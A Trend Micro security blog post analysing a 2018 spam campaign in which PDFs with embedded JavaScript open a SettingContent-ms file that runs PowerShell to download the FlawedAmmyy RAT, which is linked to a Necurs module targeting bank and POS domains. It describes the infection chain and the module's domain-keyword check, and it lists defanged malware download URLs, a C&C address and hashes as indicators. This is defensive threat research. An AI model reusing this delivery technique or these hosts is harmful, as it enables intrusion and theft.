• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Malware   »   Spam Campaign Abusing SettingContent-ms Found Dropping Same FlawedAmmyy RAT Distributed by Necurs

Spam Campaign Abusing SettingContent-ms Found Dropping Same FlawedAmmyy RAT Distributed by Necurs

  • Posted on:July 31, 2018 at 7:00 am
  • Posted in:Malware, Spam
  • Author:
    Trend Micro
0

By Anita Hsieh, Rubio Wu, and Kawabata Kohei

Trend Micro detected a spam campaign that drops the same FlawedAmmyy RAT (remote access Trojan) used by a Necurs module to install its final payload on bots under bank- and POS-related user domains. The spam campaign was also found abusing SettingContent-ms – an XML format shortcut file that opens Microsoft’s Windows Settings panel. Malicious SettingContent-ms files were found embedded in a PDF document that drops the aforementioned RAT.

width="500"

Figure 1. The volume of spam emails in July 12 and 13

From our research and analysis of spam emails sent on July 12 and 13, more than 50 percent of the email accounts that received this spam belonged to banks located in countries like Malaysia, Indonesia, Kenya, Romania, Poland, and Austria.

Infection chain

Figure 2. Infection chain of the spam campaign

The spam emails used subjects such as “invoice” or strings like “important announcement,” “copy,” “Scanned image,” “security bulletin,” and “whats this” to trick recipients. The PDF attached in the said emails contained embedded JavaScript code and a “downl.SettingContent-ms” file, similar to what ProofPoint has reported. Once the PDF file is opened by the user, the JavaScript code will trigger the SettingContent-ms file.

Once the “downl.SettingContent-ms” file is opened, Windows will run the PowerShell command inside the <DeepLink> tag, which will download the FlawedAmmyy RAT from hxxp://169[.]239[.]129[.]117/cal before executing it. This FlawedAmmyy RAT variant is the same one installed by a Necurs module on bots under bank- and POS-related user domains.

width="500"

Figure 3. Spam mail sample showing a PDF attachment with JavaScript code and SettingContent-ms

width="500"

Figure 4. The embedded JavaScript code that will be automatically triggered once the PDF is opened

width="500"

Figure 5. The embedded “downl.SettingContent-ms” file that the JavaScript code opens

width="500"

Figure 6. The JavaScript code used to open “downl.SettingContent-ms”file

width="500"

Figure 7. The “downl.SettingContent-ms” file that the JavaScript code opens after it opens the PDF

width="500"

Figure 8. The content of the “downl.SettingContent-ms file that contains the PowerShell command for downloading the FlawedAmmyy RAT

FlawedAmmyy RAT – the spam campaign’s connection to Necurs

Recently, Necurs has been showing interest in bots with specific characteristics. On July 12, Necurs pushed a module – a downloader of the FlawedAmmyy RAT – to its bots. The module checked if the domain name contained any of the following keywords: bank, banc, aloha, aldelo, and postilion (as seen in Figure 10). Aloha is a restaurant POS system, Aldelo is an iPad POS system, while Postilion is a solution for acquiring payments or transactions across all channels, from ATM and POS to ecommerce and mobile. It downloads and executes the final payload from hxxp://169[.]239[.]129[.]117/Yjdfel765Hs if the bot’s user domain matches Necurs’ criteria.

width="500"

Figure 9. The module obtained the bot’s user domain via the cmd command echo %%USERDOMAIN%%

width="500"

Figure 10. The module checks if the user domain contains any of the highlighted keywords

Trend Micro Solutions

To defend against spam and threats like Necurs, businesses can take advantage of Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions can protect users and businesses from threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachment and URLs.

Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions.

Trend Micro™ OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.

Indicators of compromise (IoCs)

IoC IoC Type Description
5181ede149a8cd560e9e0958be51ec069b486c87
14efc02509ab12eee08183a8
SHA256 Necurs module that checks if the bot is potentially bank- or POS-related
576a373ccb9b62c3c934abfe1573a87759a2bfe26
6477155e0e59f336cc28ab4
SHA256 PDF used in the spamming campaign on July 12 and 13
42ded82ef563db3b35aa797b7befd1a19ec92595
2f78f076db809aa8558b2e57
SHA256 FlawedAmmyy RAT dropped by the Necurs module and the spam campaign on July 12
185[.]99[.]132[.]119:443 IP + Port C&C of the FlawedAmmyy RAT
hxxp://169[.]239[.]129[.]117/Yjdfel765Hs URL URL used to download the FlawedAmmyy RAT in the Necurs module
hxxp://169[.]239[.]129[.]117/cal URL URL used to download the FlawedAmmyy RAT in the SettingContent-ms file embedded in the PDF

 

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: FlawedAmmy RATNECURSSettingContent-ms

Featured Stories

  • systemd Vulnerability Leads to Denial of Service on Linux
  • qkG Filecoder: Self-Replicating, Document-Encrypting Ransomware
  • Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability
  • A Closer Look at North Korea’s Internet
  • From Cybercrime to Cyberpropaganda

Security Predictions for 2019

  • Our security predictions for 2019 are based on our experts’ analysis of the progress of current and emerging technologies, user behavior, and market trends, and their impact on the threat landscape. We have categorized them according to the main areas that are likely to be affected, given the sprawling nature of the technological and sociopolitical changes under consideration.
    Read our security predictions for 2019.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • (Almost) Hollow and Innocent: Monero Miner Remains Undetected via Process Hollowing
  • Waterbear is Back, Uses API Hooking to Evade Security Product Detection
  • December Patch Tuesday: Vulnerabilities in Windows components, RDP, and PowerPoint Get Fixes
  • Obfuscation Tools Found in the Capesand Exploit Kit Possibly Used in “KurdishCoder” Campaign
  • Mobile Cyberespionage Campaign Distributed Through CallerSpy Mounts Initial Phase of a Targeted Attack

Popular Posts

  • Mac Backdoor Linked to Lazarus Targets Korean Users
  • More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting
  • New Magecart Attack Delivered Through Compromised Advertising Supply Chain
  • September Patch Tuesday Bears More Remote Desktop Vulnerability Fixes and Two Zero-Days
  • Microsoft November 2019 Patch Tuesday Reveals 74 Patches Before Major Windows Update

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.